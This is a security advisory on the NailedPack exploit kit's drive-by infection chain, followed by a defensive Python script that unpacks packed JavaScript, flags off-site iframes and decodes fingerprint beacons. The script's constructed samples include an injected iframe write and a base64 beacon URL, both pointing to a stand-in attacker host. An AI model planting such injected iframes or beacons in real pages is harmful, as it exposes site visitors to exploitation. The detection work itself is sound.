Metasploit modules used by malicious exploit kit in the wild (Sep 12, 2014)
The Dell SonicWall Threats Research team has discovered an exploit kit that uses Metasploit modules to attack the user's system. The kit has been identified as NailedPack. It is a multi-payload exploit kit that targets users based on their browser and operating system.
Infection Cycle:
A legitimate website is infected by injecting an iframe that redirects users to a malicious server. The injected iframe is obfuscated using a JavaScript packer.
After deobfuscation, the generated iframe redirects users to a landing page served from the malicious server. The landing page uses the Metasploit AutoPwn module rather than the PluginDetect JavaScript library traditionally used by other exploit kits.
Fig 3: Obfuscated AutoPwn module. Fig 4: Deobfuscated AutoPwn module.
The script above identifies the operating system, the browser and its version, and sends this information to the server base64-encoded.
In response, the server sends obfuscated JavaScript containing a list of checks; depending on their results, it requests the corresponding exploits.
This pack requests multiple exploits, and on successful exploitation additional malware may be downloaded to the system. During our analysis we did not observe any active payload being served.
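The infection chain described above, seen from the defender's side, as an added example that is not part of the Dell SonicWall write-up: a small Python script that scans a fetched page for the packer signature, unpacks the script to reveal the injected iframe's target, and decodes the base64 fingerprint beacon. It assumes the "JavaScript Packer" is Dean Edwards' /packer/, whose output begins with eval(function(p,a,c,k,e,d) and ends with the argument list ('payload', base, count, 'words'.split('|'), 0, {}). The packed script, the page host, the beacon URL and its query parameter name (d=) are constructed samples, not values taken from NailedPack traffic.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Signature of Dean Edwards' /packer/ output (assumption: this is the "JavaScript Packer" in the write-up).
PACKER_HEAD = re.compile(r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*[dr]\s*\)")
# Trailing argument list of a packed blob: ('payload', base, count, 'w0|w1|...'.split('|'), 0, {})
PACKER_ARGS = re.compile(
    r"\}\s*\(\s*'(?P<payload>(?:[^'\\]|\\.)*)'\s*,\s*(?P<base>\d+)\s*,\s*(?P<count>\d+)\s*,"
    r"\s*'(?P<words>[^']*)'\s*\.split\s*\(\s*'\|'\s*\)",
    re.DOTALL,
)
IFRAME_SRC_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
B36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def _encode(index, base):
    """Reproduce the packer's e(c): base-36 digits below 36, letters (code + 29) above, so keys match tokens."""
    head = "" if index < base else _encode(index // base, base)
    rem = index % base
    return head + (chr(rem + 29) if rem > 35 else B36[rem])


def unpack(packed):
    """Undo the packer by replacing each encoded token with its dictionary word; None if not packer output."""
    m = PACKER_ARGS.search(packed)
    if not m:
        return None
    payload = re.sub(r"\\(['\\])", r"\1", m.group("payload"))  # undo JS escaping of ' and \ in the payload
    base, count = int(m.group("base")), int(m.group("count"))
    words = m.group("words").split("|")
    table = {}
    for i in range(count):
        key = _encode(i, base)
        table[key] = words[i] if i < len(words) and words[i] else key  # empty slot: the token stands for itself
    return re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)), payload)


def scan_page(html, page_host):
    """Return indicators for a fetched page: packer signature and iframe targets on a host other than the page's."""
    findings = []
    text = html
    for m in PACKER_HEAD.finditer(html):
        findings.append("packed-script")
        unpacked = unpack(html[m.start():])
        if unpacked:
            text += "\n" + unpacked  # inspect the revealed code as if it were page markup
    for src in IFRAME_SRC_RE.findall(text):
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            findings.append("offsite-iframe:" + host)
    return findings


def decode_beacon(url):
    """Decode every base64 query value of a captured beacon URL so the fingerprint fields can be read."""
    out = {}
    for key, values in parse_qs(urlparse(url).query).items():
        for v in values:
            try:
                out[key] = base64.b64decode(v, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not base64 (or not text): leave it out
    return out


# Constructed sample: packed document.write() of an off-site iframe, embedded in an otherwise benign page.
PACKED_SAMPLE = (
    r"eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};"
    r"if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}"
    r"k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};"
    r"while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}"
    r'''return p}('0.1(\'<2 3="4://5.6/7"></2>\');',36,8,'''
    r"'document|write|iframe|src|http|bad|example|landing'.split('|'),0,{}))"
)
SAMPLE_PAGE = "<html><body><h1>Welcome</h1>\n<script>" + PACKED_SAMPLE + "</script>\n</body></html>"
# Constructed sample beacon: fingerprint fields base64-encoded in a query parameter named "d" (assumed name).
SAMPLE_BEACON = "http://bad.example/?d=b3M9V2luO2JyPUlFO3Y9OA=="

if __name__ == "__main__":
    print(unpack(PACKED_SAMPLE))
    print(scan_page(SAMPLE_PAGE, "www.legit.example"))
    print(decode_beacon(SAMPLE_BEACON))
```

The unpacker is a plain dictionary substitution: every `\w+` token in the payload is an encoded index into the word list, so no JavaScript is executed to recover the injected `document.write('<iframe ...>')`. The off-site iframe target only becomes visible after unpacking, which is why `scan_page` appends the unpacked text to the markup before looking for iframes. `decode_beacon` exposes what the fingerprinting script sends to the server; on real traffic the parameter name and field layout will differ from the constructed sample.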
Keeping software up to date helps mitigate this exploit kit. The Dell SonicWall Threats Research team will continue monitoring this exploit kit and add or update mitigation signatures as required.